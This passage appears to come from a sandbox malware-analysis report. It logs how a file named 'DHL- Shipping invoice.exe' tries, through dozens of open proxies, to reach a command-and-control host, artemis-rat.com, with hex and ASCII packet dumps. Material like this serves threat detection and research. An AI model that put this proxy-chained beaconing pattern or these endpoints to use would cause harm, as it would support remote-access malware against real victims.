                            Mar 12, 2024 08:37:01.191941977 CET1286INData Raw: 52 46 33 33 72 45 71 74 76 4e 46 39 4b 49 52 59 50 6a 6b 46 54 75 4c 6e 51 44 52 30 61 6c 30 57 69 35 34 2b 63 70 6f 45 49 76 48 6e 49 4e 39 6c 62 33 70 68 56 32 6f 31 50 77 53 6e 72 4c 70 4b 4f 52 67 6a 4a 70 39 7a 43 5a 5a 41 6a 6c 74 57 4b 33
                            Data Ascii: RF33rEqtvNF9KIRYPjkFTuLnQDR0al0Wi54+cpoEIvHnIN9lb3phV2o1PwSnrLpKORgjJp9zCZZAjltWK3IUV2iPmQ3fhDHdpmaIkm3wIdSuQtdQv4z9oEcv/hq8JD6tn/YHGuAW/Cb+AHsWFqTOG3zu+YTTR+KVnuCqFPDsx/fjXwGJJWifrRCXE34K2Tx/1XkBOYANI6TjGUSSTCf+F9+vbzgoQlrTqu3zzTFvUsS2rc0cgF/
                            Mar 12, 2024 08:37:01.551487923 CET1286INData Raw: 75 5f 63 6f 20 7b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 0a 63 6f 6c 6f 72 3a 23 32 61 32 63 33 30 3b 0a 62 6f 72 64 65 72 2d 6c 65 66 74 3a 33 70 78 20 73 6f 6c 69 64 3b 0a 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 33 70 78 20 73 6f 6c 69
                            Data Ascii: u_co {font-size:16px;color:#2a2c30;border-left:3px solid;border-right:3px solid;white-space: normal;word-wrap: break-word;}.eu_co.rsn{color:#000000;}.eu_l {display:inline;padding-left:5px;}.bh {min-height:35px;display:block;m
                            Mar 12, 2024 08:37:01.551568985 CET1286INData Raw: 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 44 6f 41 41 41 41 4d 43 41 59 41 41 41 41 7a 6d 4b 36 59 41 41 41 41 47 58 52 46 57 48 52 54 62 32 5a 30 64 32 46 79 5a 51 42 42 5a 47 39 69 5a 53 42 4a 62 57 46 6e 5a 56 4a 6c 59 57
                            Data Ascii: Rw0KGgoAAAANSUhEUgAAADoAAAAMCAYAAAAzmK6YAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyhpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV
                            Mar 12, 2024 08:37:01.551583052 CET1286INData Raw: 4b 49 64 6a 57 30 39 38 42 7a 5a 62 71 6f 2b 63 2f 36 34 48 47 63 6d 57 2b 2b 4f 65 64 38 37 33 6e 6e 42 6a 51 30 4e 4c 68 73 35 4f 54 6b 75 4a 6f 59 38 57 4b 35 47 43 6e 36 43 49 39 34 4b 32 36 49 6f 2b 4b 2b 36 78 38 5a 6d 5a 6d 5a 4c 64 35 33
                            Data Ascii: KIdjW098BzZbqo+c/64HGcmW++Oed873nnBjQ0NLhs5OTkuJoY8WK5GCn6CI94K26Io+K+6x8ZmZmZLd53+51bMtGiXswXax33noqzokh8FJ/aOLcBxPm8NZPd7GZnHXaLZaK735wf4oJ4IdqLUHGzjZO0OArEF9T21xGQnZ3tIZHEZuZY1b6LR2IvCY8WE0WEqBGPxUVR4nhukujL83X2LlEh7ok5Ik68F1doB1+rjBNV4hL3O
                            Mar 12, 2024 08:37:01.551594973 CET1286INData Raw: 0a 63 6f 6c 6f 72 3a 20 23 37 37 37 39 37 63 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 3b 0a 7d 0a 2e 73 5f 6c 20 61 20 7b 0a 70 61 64 64 69 6e 67 3a 34 70 78 3b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 66 6f 6e 74 2d 73 69
                            Data Ascii: color: #77797c;text-align:right;}.s_l a {padding:4px;cursor:pointer;font-size:13px;}.s_l .sprt {margin-left: 6px;margin-right: 4px;padding-right: 0;cursor: default;height: 14px;border-left: 1px #cfd0d1 solid;}.langSelector{wi
                            Mar 12, 2024 08:37:01.551608086 CET888INData Raw: 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 3c 74 64 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 63 6c 61 73 73 3d 22 62 68 22 3e 0a 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67
                            Data Ascii: align="center"><td align="center" class="bh"><img alt="Zscaler" src="https://login.zscaler.net/img_logo_new1.png"></td></tr></tbody></table></div><table class="m_tbl" cellpadding="0" cellspacing="0" align="center"><tbody><tr><td height="


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            372192.168.2.451277184.178.172.2341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.469352007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            373192.168.2.451312198.74.51.7988886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.470805883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            374192.168.2.45112452.172.1.186806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.471103907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.032898903 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:09.033699036 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 f0 06 24 09 43 8e 02 88 65 f6 09 33 6b bc bc 8a cd 00 3e 93 e4 ad 00 4d 0b 7d ca 5c ce 30 86 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: lhe$Ce3k>M}\0*,+0/$#('=<5/artemis-rat.com#L'l0fj9*h1:7%^8;Kq"j%v=#w
                            Mar 12, 2024 08:37:09.627686024 CET1200INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 70 24 ce 77 d1 d1 b7 71 32 db 2a e2 db 68 47 ff 85 3c 78 fd 58 03 78 23 8c 65 f4 31 c3 91 f8 96 00 c0 2f 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 06 f7 0b 00 06 f3 00 06 f0 00 03 55 30
                            Data Ascii: =9p$wq2*hG<xXx#e1/U0Q09Q!I+s?0*H0910UIN10UCISCO10USTBU10UCN0240214225240Z240514225239Z010Uartemis-
                            Mar 12, 2024 08:37:09.627702951 CET968INData Raw: c6 2b ca 0a 96 46 81 42 87 13 8e 2d c7 83 e0 38 e0 78 04 a2 16 fd 14 33 24 68 bd 49 a6 e0 0f 4e 5e 0a 9b 8a 8a 9e 6f f5 c2 a6 42 1d 4d a3 e5 ee 13 09 53 54 ef 77 c3 f6 78 45 cf 3e b9 10 c8 78 c9 bf ff 86 e3 9b 22 b4 d0 3a 41 61 a6 37 ad 67 94 f4
                            Data Ascii: +FB-8x3$hIN^oBMSTwxE>x":Aa7g@t6K_/nfGms.rBnAEv!}H?g^N)R+#B1fk=JL{7.q[_UKRk/9i)#jIX$s"\00UD;&
                            Mar 12, 2024 08:37:09.971473932 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 fd de 0d d3 7a f9 8f 5a 9a 0b 8f 2d 6e 0c 79 c4 bf f7 e7 f6 b1 d2 84 4e 43 04 f5 49 9e 61 5c 2e 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 5e 22 65 8a d3 2b 2d df 93 48 6d 52 51 56 14 c3 c8 7a d0 12 08
                            Data Ascii: %! zZ-nyNCIa\.(^"e+-HmRQVz%!.Y
                            Mar 12, 2024 08:37:10.353233099 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 94 a7 08 02 f2 44 64 63 f0 9d 17 15 0b 28 52 54 81 3a 8b 14 9a c8 c6 85 88 53 8d be 9c 6f f3 00 f7 4c a9 13 8e d3 89 1c
                            Data Ascii: (Ddc(RT:SoL


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            375192.168.2.45125018.228.198.164806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.471267939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.672070980 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0
                            Mar 12, 2024 08:37:00.678436995 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 f0 06 1b bc 51 a2 94 eb 4d 8d 07 11 ae ea 57 19 d6 ae 03 9a b8 43 68 a6 2a 94 10 02 a4 e1 21 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: eQMWCh*!*,+0/$#('=<5/Uartemis-rat.com#
                            Mar 12, 2024 08:37:00.879965067 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 e5 d2 95 2a 4b dc ff f8 c6 f3 32 63 c4 2e c7 4e 61 eb 38 ca be 8d 27 3f 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                            Data Ascii: =9*K2c.Na8'?DOWNGRD0000*H010Uartemis-rat.com0240312063905Z260312063905Z010Uartemis-rat.com0"0*H09L_ ID
                            Mar 12, 2024 08:37:00.934099913 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 af 6c 3e 29 b1 c1 cb 5d 82 16 07 40 5e 1a 4e 5b cf 84 23 2f ab 95 60 a3 fa 0d 79 59 65 c4 63 2e 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 2a e1 c1 4e c7 52 0d f4 10 45 13 7a 52 0d 19 61 bd c4 4a 41 b8
                            Data Ascii: %! l>)]@^N[#/`yYec.(*NREzRaJA4:I5
                            Mar 12, 2024 08:37:01.132369995 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 0c 7f 83 4a e9 8b 0d ac c6 5f 04 33 26 fe 00 c7 11 73 42 28 3a d1 b1 02 ed b0 ee 2d b7 6f 88 91 15 af bb 1d 87 51 2b e4
                            Data Ascii: (J_3&sB(:-oQ+


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            376192.168.2.451270104.37.135.14541456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.471348047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            377192.168.2.451319184.178.172.1741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.471519947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            378192.168.2.45124794.177.106.17823246484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.471580982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            379192.168.2.45132582.64.77.30806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.472141981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.656285048 CET555INHTTP/1.1 403 Proxy Error
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Server: Apache
                            X-XSS-Protection: 1; mode=block
                            X-Content-Type-Options: nosniff
                            X-Frame-Options: SAMEORIGIN
                            Content-Length: 313
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 43 6f 6e 6e 65 63 74 20 74 6f 20 72 65 6d 6f 74 65 20 6d 61 63 68 69 6e 65 20 62 6c 6f 63 6b 65 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Proxy Error</title></head><body><h1>Proxy Error</h1><p>You don't have permission to access this resource.The proxy server could not handle the request<p>Reason: <strong>Connect to remote machine blocked</strong></p></p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            380192.168.2.451130120.78.191.225806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.472356081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.810554981 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            381192.168.2.451380172.67.181.89806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.472565889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.560174942 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            382192.168.2.451164203.222.24.36806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.472657919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            383192.168.2.451114106.105.218.244806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.472747087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            384192.168.2.451334162.240.78.74617926484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.472839117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.937243938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.452912092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.596379042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.641175985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.750421047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.816112995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.953197002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.141196012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            385192.168.2.451113171.244.140.160623106484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.473408937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.234138966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.447794914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.750238895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.240328074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.750499010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.246301889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.343704939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:45.343564034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            386192.168.2.45116013.229.47.109806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
